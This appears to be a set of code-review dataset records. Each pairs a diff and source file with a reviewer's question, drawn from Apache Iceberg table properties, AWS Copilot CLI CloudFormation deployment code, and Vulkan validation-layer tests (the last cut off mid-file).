// 1 minute public static final String COMMIT_TOTAL_RETRY_TIME_MS = "commit.retry.total-timeout-ms"; public static final int COMMIT_TOTAL_RETRY_TIME_MS_DEFAULT = 1800000; // 30 minutes public static final String COMMIT_NUM_STATUS_CHECKS = "commit.num-status-checks"; public static final int COMMIT_NUM_STATUS_CHECKS_DEFAULT = 3; public static final String MANIFEST_TARGET_SIZE_BYTES = "commit.manifest.target-size-bytes"; public static final long MANIFEST_TARGET_SIZE_BYTES_DEFAULT = 8388608; // 8 MB public static final String MANIFEST_MIN_MERGE_COUNT = "commit.manifest.min-count-to-merge"; public static final int MANIFEST_MIN_MERGE_COUNT_DEFAULT = 100; public static final String MANIFEST_MERGE_ENABLED = "commit.manifest-merge.enabled"; public static final boolean MANIFEST_MERGE_ENABLED_DEFAULT = true; public static final String DEFAULT_FILE_FORMAT = "write.format.default"; public static final String DEFAULT_FILE_FORMAT_DEFAULT = "parquet"; public static final String PARQUET_ROW_GROUP_SIZE_BYTES = "write.parquet.row-group-size-bytes"; public static final String PARQUET_ROW_GROUP_SIZE_BYTES_DEFAULT = "134217728"; // 128 MB public static final String PARQUET_PAGE_SIZE_BYTES = "write.parquet.page-size-bytes"; public static final String PARQUET_PAGE_SIZE_BYTES_DEFAULT = "1048576"; // 1 MB public static final String PARQUET_DICT_SIZE_BYTES = "write.parquet.dict-size-bytes"; public static final String PARQUET_DICT_SIZE_BYTES_DEFAULT = "2097152"; // 2 MB public static final String PARQUET_COMPRESSION = "write.parquet.compression-codec"; public static final String PARQUET_COMPRESSION_DEFAULT = "gzip"; public static final String PARQUET_COMPRESSION_LEVEL = "write.parquet.compression-level"; public static final String PARQUET_COMPRESSION_LEVEL_DEFAULT = null; public static final String AVRO_COMPRESSION = "write.avro.compression-codec"; public static final String AVRO_COMPRESSION_DEFAULT = "gzip"; public static final String SPLIT_SIZE = "read.split.target-size"; public static final long SPLIT_SIZE_DEFAULT = 134217728; // 128 MB public static final String METADATA_SPLIT_SIZE = "read.split.metadata-target-size"; public static final long METADATA_SPLIT_SIZE_DEFAULT = 32 * 1024 * 1024; // 32 MB public static final String SPLIT_LOOKBACK = "read.split.planning-lookback"; public static final int SPLIT_LOOKBACK_DEFAULT = 10; public static final String SPLIT_OPEN_FILE_COST = "read.split.open-file-cost"; public static final long SPLIT_OPEN_FILE_COST_DEFAULT = 4 * 1024 * 1024; // 4MB public static final String PARQUET_VECTORIZATION_ENABLED = "read.parquet.vectorization.enabled"; public static final boolean PARQUET_VECTORIZATION_ENABLED_DEFAULT = false; public static final String PARQUET_BATCH_SIZE = "read.parquet.vectorization.batch-size"; public static final int PARQUET_BATCH_SIZE_DEFAULT = 5000; public static final String ORC_VECTORIZATION_ENABLED = "read.orc.vectorization.enabled"; public static final boolean ORC_VECTORIZATION_ENABLED_DEFAULT = false; public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled"; public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false; public static final String OBJECT_STORE_PATH = "write.object-storage.path"; public static final String WRITE_LOCATION_PROVIDER_IMPL = "write.location-provider.impl"; // This only applies to files written after this property is set. Files previously written aren't // relocated to reflect this parameter. // If not set, defaults to a "data" folder underneath the root path of the table. public static final String WRITE_NEW_DATA_LOCATION = "write.folder-storage.path"; // This only applies to files written after this property is set. Files previously written aren't // relocated to reflect this parameter. // If not set, defaults to a "metadata" folder underneath the root path of the table. public static final String WRITE_METADATA_LOCATION = "write.metadata.path"; public static final String WRITE_PARTITION_SUMMARY_LIMIT = "write.summary.partition-limit"; public static final int WRITE_PARTITION_SUMMARY_LIMIT_DEFAULT = 0; public static final String MANIFEST_LISTS_ENABLED = "write.manifest-lists.enabled"; public static final boolean MANIFEST_LISTS_ENABLED_DEFAULT = true; public static final String METADATA_COMPRESSION = "write.metadata.compression-codec"; public static final String METADATA_COMPRESSION_DEFAULT = "none"; public static final String METADATA_PREVIOUS_VERSIONS_MAX = "write.metadata.previous-versions-max"; public static final int METADATA_PREVIOUS_VERSIONS_MAX_DEFAULT = 100; // This enables to delete the oldest metadata file after commit. public static final String METADATA_DELETE_AFTER_COMMIT_ENABLED = "write.metadata.delete-after-commit.enabled"; public static final boolean METADATA_DELETE_AFTER_COMMIT_ENABLED_DEFAULT = false; public static final String METRICS_MODE_COLUMN_CONF_PREFIX = "write.metadata.metrics.column."; public static final String DEFAULT_WRITE_METRICS_MODE = "write.metadata.metrics.default"; public static final String DEFAULT_WRITE_METRICS_MODE_DEFAULT = "truncate(16)"; public static final String DEFAULT_NAME_MAPPING = "schema.name-mapping.default"; public static final String WRITE_AUDIT_PUBLISH_ENABLED = "write.wap.enabled"; public static final String WRITE_AUDIT_PUBLISH_ENABLED_DEFAULT = "false"; public static final String WRITE_TARGET_FILE_SIZE_BYTES = "write.target-file-size-bytes"; public static final long WRITE_TARGET_FILE_SIZE_BYTES_DEFAULT = 536870912; // 512 MB public static final String SPARK_WRITE_PARTITIONED_FANOUT_ENABLED = "write.spark.fanout.enabled"; public static final boolean SPARK_WRITE_PARTITIONED_FANOUT_ENABLED_DEFAULT = false; public static final String SNAPSHOT_ID_INHERITANCE_ENABLED = "compatibility.snapshot-id-inheritance.enabled"; public static final boolean SNAPSHOT_ID_INHERITANCE_ENABLED_DEFAULT = false; public static final String ENGINE_HIVE_ENABLED = "engine.hive.enabled"; public static final boolean ENGINE_HIVE_ENABLED_DEFAULT = false; public static final String WRITE_DISTRIBUTION_MODE = "write.distribution-mode"; public static final String WRITE_DISTRIBUTION_MODE_NONE = "none"; public static final String WRITE_DISTRIBUTION_MODE_HASH = "hash"; public static final String WRITE_DISTRIBUTION_MODE_RANGE = "range"; public static final String WRITE_DISTRIBUTION_MODE_DEFAULT = WRITE_DISTRIBUTION_MODE_NONE; public static final String GC_ENABLED = "gc.enabled"; public static final boolean GC_ENABLED_DEFAULT = true; public static final String MAX_SNAPSHOT_AGE_MS = "history.expire.max-snapshot-age-ms"; public static final long MAX_SNAPSHOT_AGE_MS_DEFAULT = 5 * 24 * 60 * 60 * 1000; // 5 days public static final String MIN_SNAPSHOTS_TO_KEEP = "history.expire.min-snapshots-to-keep"; public static final int MIN_SNAPSHOTS_TO_KEEP_DEFAULT = 1; public static final String DELETE_ISOLATION_LEVEL = "write.delete.isolation-level"; public static final String DELETE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String DELETE_MODE = "write.delete.mode"; public static final String DELETE_MODE_DEFAULT = "copy-on-write"; public static final String UPDATE_ISOLATION_LEVEL = "write.update.isolation-level"; public static final String UPDATE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String UPDATE_MODE = "write.update.mode"; public static final String UPDATE_MODE_DEFAULT = "copy-on-write"; public static final String MERGE_ISOLATION_LEVEL = "write.merge.isolation-level"; public static final String MERGE_ISOLATION_LEVEL_DEFAULT = "serializable"; public static final String MERGE_MODE = "write.merge.mode"; public static final String MERGE_MODE_DEFAULT = "copy-on-write"; public static final String MERGE_CARDINALITY_CHECK_ENABLED = "write.merge.cardinality-check.enabled"; public static final boolean MERGE_CARDINALITY_CHECK_ENABLED_DEFAULT = true; }
1
37,157
What is the current default? Is that inconsistent across uses and that's why this is null?
apache-iceberg
java
@@ -477,6 +477,7 @@ func (cf CloudFormation) getLastDeployedAppConfig(appConfig *stack.AppStackConfi if err != nil { return nil, fmt.Errorf("parse previous deployed stackset %w", err) } + previouslyDeployedConfig.App = appConfig.Name return previouslyDeployedConfig, nil }
1
// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cloudformation import ( "context" "errors" "fmt" "github.com/aws/aws-sdk-go/aws" sdkcloudformation "github.com/aws/aws-sdk-go/service/cloudformation" sdkcloudformationiface "github.com/aws/aws-sdk-go/service/cloudformation/cloudformationiface" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation/stackset" "github.com/aws/copilot-cli/internal/pkg/config" "github.com/aws/copilot-cli/internal/pkg/deploy" "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation/stack" ) // DeployApp sets up everything required for our application-wide resources. // These resources include things that are regional, rather than scoped to a particular // environment, such as ECR Repos, CodePipeline KMS keys & S3 buckets. // We deploy application resources through StackSets - that way we can have one // template that we update and all regional stacks are updated. func (cf CloudFormation) DeployApp(in *deploy.CreateAppInput) error { appConfig := stack.NewAppStackConfig(in) s, err := toStack(appConfig) if err != nil { return err } if err := cf.cfnClient.CreateAndWait(s); err != nil { // If the stack already exists - we can move on to creating the StackSet. var alreadyExists *cloudformation.ErrStackAlreadyExists if !errors.As(err, &alreadyExists) { return err } } blankAppTemplate, err := appConfig.ResourceTemplate(&stack.AppResourcesConfig{ App: appConfig.Name, }) if err != nil { return err } return cf.appStackSet.Create(appConfig.StackSetName(), blankAppTemplate, stackset.WithDescription(appConfig.StackSetDescription()), stackset.WithExecutionRoleName(appConfig.StackSetExecutionRoleName()), stackset.WithAdministrationRoleARN(appConfig.StackSetAdminRoleARN()), stackset.WithTags(toMap(appConfig.Tags()))) } func (cf CloudFormation) UpgradeApplication(in *deploy.CreateAppInput) error { appConfig := stack.NewAppStackConfig(in) s, err := toStack(appConfig) if err != nil { return err } if err := cf.upgradeAppStack(s); err != nil { return err } return cf.upgradeAppStackSet(appConfig) } func (cf CloudFormation) upgradeAppStackSet(config *stack.AppStackConfig) error { for { ssName := config.StackSetName() if err := cf.appStackSet.WaitForStackSetLastOperationComplete(ssName); err != nil { return fmt.Errorf("wait for stack set %s last operation complete: %w", ssName, err) } previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(config) if err != nil { return err } previouslyDeployedConfig.Version += 1 err = cf.deployAppConfig(config, previouslyDeployedConfig) if err == nil { return nil } var stackSetOutOfDateErr *stackset.ErrStackSetOutOfDate if errors.As(err, &stackSetOutOfDateErr) { continue } return err } } func (cf CloudFormation) upgradeAppStack(s *cloudformation.Stack) error { for { // Upgrade app stack. descr, err := cf.cfnClient.Describe(s.Name) if err != nil { return fmt.Errorf("describe stack %s: %w", s.Name, err) } if cloudformation.StackStatus(aws.StringValue(descr.StackStatus)).InProgress() { // There is already an update happening to the app stack. // Best-effort try to wait for the existing update to be over before retrying. _ = cf.cfnClient.WaitForUpdate(context.Background(), s.Name) continue } s.Parameters = descr.Parameters s.Tags = descr.Tags err = cf.cfnClient.UpdateAndWait(s) if err == nil { // Success. return nil } if retryable := isRetryableUpdateError(s.Name, err); retryable { continue } // The changes are already applied, nothing to do. Exit successfully. var emptyChangeSet *cloudformation.ErrChangeSetEmpty if errors.As(err, &emptyChangeSet) { return nil } return fmt.Errorf("update and wait for stack %s: %w", s.Name, err) } } // DelegateDNSPermissions grants the provided account ID the ability to write to this application's // DNS HostedZone. This allows us to perform cross account DNS delegation. func (cf CloudFormation) DelegateDNSPermissions(app *config.Application, accountID string) error { deployApp := deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, DomainName: app.Domain, DomainHostedZoneID: app.DomainHostedZoneID, Version: deploy.LatestAppTemplateVersion, } appConfig := stack.NewAppStackConfig(&deployApp) appStack, err := cf.cfnClient.Describe(appConfig.StackName()) if err != nil { return fmt.Errorf("getting existing application infrastructure stack: %w", err) } dnsDelegatedAccounts := stack.DNSDelegatedAccountsForStack(appStack.SDK()) deployApp.DNSDelegationAccounts = append(dnsDelegatedAccounts, accountID) s, err := toStack(stack.NewAppStackConfig(&deployApp)) if err != nil { return err } if err := cf.cfnClient.UpdateAndWait(s); err != nil { var errNoUpdates *cloudformation.ErrChangeSetEmpty if errors.As(err, &errNoUpdates) { return nil } return fmt.Errorf("updating application to allow DNS delegation: %w", err) } return nil } // GetAppResourcesByRegion fetches all the regional resources for a particular region. func (cf CloudFormation) GetAppResourcesByRegion(app *config.Application, region string) (*stack.AppRegionalResources, error) { resources, err := cf.getResourcesForStackInstances(app, &region) if err != nil { return nil, fmt.Errorf("describing application resources: %w", err) } if len(resources) == 0 { return nil, fmt.Errorf("no regional resources for application %s in region %s found", app.Name, region) } return resources[0], nil } // GetRegionalAppResources fetches all the regional resources for a particular application. func (cf CloudFormation) GetRegionalAppResources(app *config.Application) ([]*stack.AppRegionalResources, error) { resources, err := cf.getResourcesForStackInstances(app, nil) if err != nil { return nil, fmt.Errorf("describing application resources: %w", err) } return resources, nil } func (cf CloudFormation) getResourcesForStackInstances(app *config.Application, region *string) ([]*stack.AppRegionalResources, error) { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, }) opts := []stackset.InstanceSummariesOption{ stackset.FilterSummariesByAccountID(app.AccountID), } if region != nil { opts = append(opts, stackset.FilterSummariesByRegion(*region)) } summaries, err := cf.appStackSet.InstanceSummaries(appConfig.StackSetName(), opts...) if err != nil { return nil, err } var regionalResources []*stack.AppRegionalResources for _, summary := range summaries { // Since these stacks will likely be in another region, we can't use // the default cf client. Instead, we'll have to create a new client // configured with the stack's region. regionalCFClient := cf.regionalClient(summary.Region) cfStack, err := regionalCFClient.Describe(summary.StackID) if err != nil { return nil, fmt.Errorf("getting outputs for stack %s in region %s: %w", summary.StackID, summary.Region, err) } regionalResource, err := stack.ToAppRegionalResources(cfStack.SDK()) if err != nil { return nil, err } regionalResource.Region = summary.Region regionalResources = append(regionalResources, regionalResource) } return regionalResources, nil } // AddServiceToApp attempts to add new service specific resources to the application resource stack. // Currently, this means that we'll set up an ECR repo with a policy for all envs to be able // to pull from it. func (cf CloudFormation) AddServiceToApp(app *config.Application, svcName string) error { if err := cf.addWorkloadToApp(app, svcName); err != nil { return fmt.Errorf("adding service %s resources to application %s: %w", svcName, app.Name, err) } return nil } // AddJobToApp attempts to add new job-specific resources to the application resource stack. // Currently, this means that we'll set up an ECR repo with a policy for all envs to be able // to pull from it. func (cf CloudFormation) AddJobToApp(app *config.Application, jobName string) error { if err := cf.addWorkloadToApp(app, jobName); err != nil { return fmt.Errorf("adding job %s resources to application %s: %w", jobName, app.Name, err) } return nil } func (cf CloudFormation) addWorkloadToApp(app *config.Application, wlName string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, AdditionalTags: app.Tags, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return err } // We'll generate a new list of Accounts to add to our application // infrastructure by appending the environment's account if it // doesn't already exist. var wlList []string shouldAddNewWl := true // For now, AppResourcesConfig.Services refers to workloads, including both services and jobs. for _, wl := range previouslyDeployedConfig.Services { wlList = append(wlList, wl) if wl == wlName { shouldAddNewWl = false } } if !shouldAddNewWl { return nil } wlList = append(wlList, wlName) newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: wlList, Accounts: previouslyDeployedConfig.Accounts, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return err } return nil } // RemoveServiceFromApp attempts to remove service-specific resources (ECR repositories) from the application resource stack. func (cf CloudFormation) RemoveServiceFromApp(app *config.Application, svcName string) error { if err := cf.removeWorkloadFromApp(app, svcName); err != nil { return fmt.Errorf("removing %s service resources from application: %w", svcName, err) } return nil } // RemoveJobFromApp attempts to remove job-specific resources (ECR repositories) from the application resource stack. func (cf CloudFormation) RemoveJobFromApp(app *config.Application, jobName string) error { if err := cf.removeWorkloadFromApp(app, jobName); err != nil { return fmt.Errorf("removing %s job resources from application: %w", jobName, err) } return nil } func (cf CloudFormation) removeWorkloadFromApp(app *config.Application, wlName string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return fmt.Errorf("get previous application %s config: %w", app.Name, err) } // We'll generate a new list of Accounts to remove the account associated // with the input workload to be removed. var wlList []string shouldRemoveWl := false // For now, AppResourcesConfig.Services refers to workloads, including both services and jobs. for _, wl := range previouslyDeployedConfig.Services { if wl == wlName { shouldRemoveWl = true continue } wlList = append(wlList, wl) } if !shouldRemoveWl { return nil } newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: wlList, Accounts: previouslyDeployedConfig.Accounts, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return err } return nil } // AddEnvToAppOpts contains the parameters to call AddEnvToApp. type AddEnvToAppOpts struct { App *config.Application EnvName string EnvAccountID string EnvRegion string } // AddEnvToApp takes a new environment and updates the application configuration // with new Account IDs in resource policies (KMS Keys and ECR Repos) - and // sets up a new stack instance if the environment is in a new region. func (cf CloudFormation) AddEnvToApp(opts *AddEnvToAppOpts) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: opts.App.Name, AccountID: opts.App.AccountID, AdditionalTags: opts.App.Tags, Version: deploy.LatestAppTemplateVersion, }) previouslyDeployedConfig, err := cf.getLastDeployedAppConfig(appConfig) if err != nil { return fmt.Errorf("getting previous deployed stackset %w", err) } // We'll generate a new list of Accounts to add to our application // infrastructure by appending the environment's account if it // doesn't already exist. var accountList []string shouldAddNewAccountID := true for _, accountID := range previouslyDeployedConfig.Accounts { accountList = append(accountList, accountID) if accountID == opts.EnvAccountID { shouldAddNewAccountID = false } } if shouldAddNewAccountID { accountList = append(accountList, opts.EnvAccountID) } newDeploymentConfig := stack.AppResourcesConfig{ Version: previouslyDeployedConfig.Version + 1, Services: previouslyDeployedConfig.Services, Accounts: accountList, App: appConfig.Name, } if err := cf.deployAppConfig(appConfig, &newDeploymentConfig); err != nil { return fmt.Errorf("adding %s environment resources to application: %w", opts.EnvName, err) } if err := cf.addNewAppStackInstances(appConfig, opts.EnvRegion); err != nil { return fmt.Errorf("adding new stack instance for environment %s: %w", opts.EnvName, err) } return nil } var getRegionFromClient = func(client sdkcloudformationiface.CloudFormationAPI) (string, error) { concrete, ok := client.(*sdkcloudformation.CloudFormation) if !ok { return "", errors.New("failed to retrieve the region") } return *concrete.Client.Config.Region, nil } // AddPipelineResourcesToApp conditionally adds resources needed to support // a pipeline in the application region (i.e. the same region that hosts our SSM store). // This is necessary because the application region might not contain any environment. func (cf CloudFormation) AddPipelineResourcesToApp( app *config.Application, appRegion string) error { appConfig := stack.NewAppStackConfig(&deploy.CreateAppInput{ Name: app.Name, AccountID: app.AccountID, Version: deploy.LatestAppTemplateVersion, }) // conditionally create a new stack instance in the application region // if there's no existing stack instance. if err := cf.addNewAppStackInstances(appConfig, appRegion); err != nil { return fmt.Errorf("failed to add stack instance for pipeline, application: %s, region: %s, error: %w", app.Name, appRegion, err) } return nil } func (cf CloudFormation) deployAppConfig(appConfig *stack.AppStackConfig, resources *stack.AppResourcesConfig) error { newTemplateToDeploy, err := appConfig.ResourceTemplate(resources) if err != nil { return err } // Every time we deploy the StackSet, we include a version field in the stack metadata. // When we go to update the StackSet, we include that version + 1 as the "Operation ID". // This ensures that we don't overwrite any changes that may have been applied between // us reading the stack and actually updating it. // As an example: // * We read the stack with Version 1 // * Someone else reads the stack with Version 1 // * We update the StackSet with Version 2, the update completes. // * Someone else tries to update the StackSet with their stale version 2. // * "2" has already been used as an operation ID, and the stale write fails. return cf.appStackSet.UpdateAndWait(appConfig.StackSetName(), newTemplateToDeploy, stackset.WithOperationID(fmt.Sprintf("%d", resources.Version)), stackset.WithDescription(appConfig.StackSetDescription()), stackset.WithExecutionRoleName(appConfig.StackSetExecutionRoleName()), stackset.WithAdministrationRoleARN(appConfig.StackSetAdminRoleARN()), stackset.WithTags(toMap(appConfig.Tags()))) } // addNewAppStackInstances takes an environment and determines if we need to create a new // stack instance. We only spin up a new stack instance if the env is in a new region. func (cf CloudFormation) addNewAppStackInstances(appConfig *stack.AppStackConfig, region string) error { summaries, err := cf.appStackSet.InstanceSummaries(appConfig.StackSetName()) if err != nil { return err } // We only want to deploy a new StackInstance if we're // adding an environment in a new region. shouldDeployNewStackInstance := true for _, summary := range summaries { if summary.Region == region { shouldDeployNewStackInstance = false } } if !shouldDeployNewStackInstance { return nil } // Set up a new Stack Instance for the new region. The Stack Instance will inherit the latest StackSet template. return cf.appStackSet.CreateInstancesAndWait(appConfig.StackSetName(), []string{appConfig.AccountID}, []string{region}) } func (cf CloudFormation) getLastDeployedAppConfig(appConfig *stack.AppStackConfig) (*stack.AppResourcesConfig, error) { // Check the existing deploy stack template. From that template, we'll parse out the list of services and accounts that // are deployed in the stack. descr, err := cf.appStackSet.Describe(appConfig.StackSetName()) if err != nil { return nil, err } previouslyDeployedConfig, err := stack.AppConfigFrom(&descr.Template) if err != nil { return nil, fmt.Errorf("parse previous deployed stackset %w", err) } return previouslyDeployedConfig, nil } // DeleteApp deletes all application specific StackSet and Stack resources. func (cf CloudFormation) DeleteApp(appName string) error { if err := cf.appStackSet.Delete(fmt.Sprintf("%s-infrastructure", appName)); err != nil { return err } return cf.cfnClient.DeleteAndWait(fmt.Sprintf("%s-infrastructure-roles", appName)) }
1
17,252
Why did we make this change? How come it wasn't an issue before
aws-copilot-cli
go
@@ -4342,14 +4342,11 @@ TEST_F(VkLayerTest, InvalidDescriptorSet) { // ObjectTracker should catch this. // Create a valid cmd buffer // call vk::CmdBindDescriptorSets w/ false Descriptor Set + ASSERT_NO_FATAL_FAILURE(Init()); uint64_t fake_set_handle = 0xbaad6001; VkDescriptorSet bad_set = reinterpret_cast<VkDescriptorSet &>(fake_set_handle); - m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-pDescriptorSets-parameter"); - - ASSERT_NO_FATAL_FAILURE(Init()); - VkDescriptorSetLayoutBinding layout_binding = {}; layout_binding.binding = 0; layout_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
1
/* * Copyright (c) 2015-2020 The Khronos Group Inc. * Copyright (c) 2015-2020 Valve Corporation * Copyright (c) 2015-2020 LunarG, Inc. * Copyright (c) 2015-2020 Google, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Author: Chia-I Wu <[email protected]> * Author: Chris Forbes <[email protected]> * Author: Courtney Goeltzenleuchter <[email protected]> * Author: Mark Lobodzinski <[email protected]> * Author: Mike Stroyan <[email protected]> * Author: Tobin Ehlis <[email protected]> * Author: Tony Barbour <[email protected]> * Author: Cody Northrop <[email protected]> * Author: Dave Houlton <[email protected]> * Author: Jeremy Kniager <[email protected]> * Author: Shannon McPherson <[email protected]> * Author: John Zulauf <[email protected]> */ #include "cast_utils.h" #include "layer_validation_tests.h" TEST_F(VkLayerTest, GpuValidationArrayOOBGraphicsShaders) { TEST_DESCRIPTION( "GPU validation: Verify detection of out-of-bounds descriptor array indexing and use of uninitialized descriptors."); VkValidationFeatureEnableEXT enables[] = {VK_VALIDATION_FEATURE_ENABLE_GPU_ASSISTED_EXT}; VkValidationFeaturesEXT features = {}; features.sType = VK_STRUCTURE_TYPE_VALIDATION_FEATURES_EXT; features.enabledValidationFeatureCount = 1; features.pEnabledValidationFeatures = enables; bool descriptor_indexing = CheckDescriptorIndexingSupportAndInitFramework(this, m_instance_extension_names, m_device_extension_names, &features, m_errorMonitor); if (DeviceIsMockICD() || DeviceSimulation()) { printf("%s GPU-Assisted validation test requires a driver that can draw.\n", kSkipPrefix); return; } VkPhysicalDeviceFeatures2KHR features2 = {}; auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); if (descriptor_indexing) { PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); if (!indexing_features.runtimeDescriptorArray || !indexing_features.descriptorBindingSampledImageUpdateAfterBind || !indexing_features.descriptorBindingPartiallyBound || !indexing_features.descriptorBindingVariableDescriptorCount || !indexing_features.shaderSampledImageArrayNonUniformIndexing || !indexing_features.shaderStorageBufferArrayNonUniformIndexing) { printf("Not all descriptor indexing features supported, skipping descriptor indexing tests\n"); descriptor_indexing = false; } } VkCommandPoolCreateFlags pool_flags = VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, pool_flags)); if (m_device->props.apiVersion < VK_API_VERSION_1_1) { printf("%s GPU-Assisted validation test requires Vulkan 1.1+.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Make a uniform buffer to be passed to the shader that contains the invalid array index. uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 1024; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; VkMemoryPropertyFlags mem_props = VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT; buffer0.init(*m_device, bci, mem_props); bci.usage = VK_BUFFER_USAGE_STORAGE_BUFFER_BIT; // Make another buffer to populate the buffer array to be indexed VkBufferObj buffer1; buffer1.init(*m_device, bci, mem_props); void *layout_pnext = nullptr; void *allocate_pnext = nullptr; auto pool_create_flags = 0; auto layout_create_flags = 0; VkDescriptorBindingFlagsEXT ds_binding_flags[2] = {}; VkDescriptorSetLayoutBindingFlagsCreateInfoEXT layout_createinfo_binding_flags[1] = {}; if (descriptor_indexing) { ds_binding_flags[0] = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT; layout_createinfo_binding_flags[0].sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_BINDING_FLAGS_CREATE_INFO_EXT; layout_createinfo_binding_flags[0].pNext = NULL; layout_createinfo_binding_flags[0].bindingCount = 2; layout_createinfo_binding_flags[0].pBindingFlags = ds_binding_flags; layout_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; pool_create_flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; layout_pnext = layout_createinfo_binding_flags; } // Prepare descriptors OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 6, VK_SHADER_STAGE_ALL, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags); VkDescriptorSetVariableDescriptorCountAllocateInfoEXT variable_count = {}; uint32_t desc_counts; if (descriptor_indexing) { layout_create_flags = 0; pool_create_flags = 0; ds_binding_flags[1] = VK_DESCRIPTOR_BINDING_PARTIALLY_BOUND_BIT_EXT | VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; desc_counts = 6; // We'll reserve 8 spaces in the layout, but the descriptor will only use 6 variable_count.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_VARIABLE_DESCRIPTOR_COUNT_ALLOCATE_INFO_EXT; variable_count.descriptorSetCount = 1; variable_count.pDescriptorCounts = &desc_counts; allocate_pnext = &variable_count; } OneOffDescriptorSet descriptor_set_variable(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 8, VK_SHADER_STAGE_ALL, nullptr}, }, layout_create_flags, layout_pnext, pool_create_flags, allocate_pnext); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); const VkPipelineLayoutObj pipeline_layout_variable(m_device, {&descriptor_set_variable.layout_}); VkTextureObj texture(m_device, nullptr); VkSamplerObj sampler(m_device); VkDescriptorBufferInfo buffer_info[1] = {}; buffer_info[0].buffer = buffer0.handle(); buffer_info[0].offset = 0; buffer_info[0].range = sizeof(uint32_t); VkDescriptorImageInfo image_info[6] = {}; for (int i = 0; i < 6; i++) { image_info[i] = texture.DescriptorImageInfo(); image_info[i].sampler = sampler.handle(); image_info[i].imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; } VkWriteDescriptorSet descriptor_writes[2] = {}; descriptor_writes[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[0].dstSet = descriptor_set.set_; // descriptor_set; descriptor_writes[0].dstBinding = 0; descriptor_writes[0].descriptorCount = 1; descriptor_writes[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_writes[0].pBufferInfo = buffer_info; descriptor_writes[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_writes[1].dstSet = descriptor_set.set_; // descriptor_set; descriptor_writes[1].dstBinding = 1; if (descriptor_indexing) descriptor_writes[1].descriptorCount = 5; // Intentionally don't write index 5 else descriptor_writes[1].descriptorCount = 6; descriptor_writes[1].descriptorType = 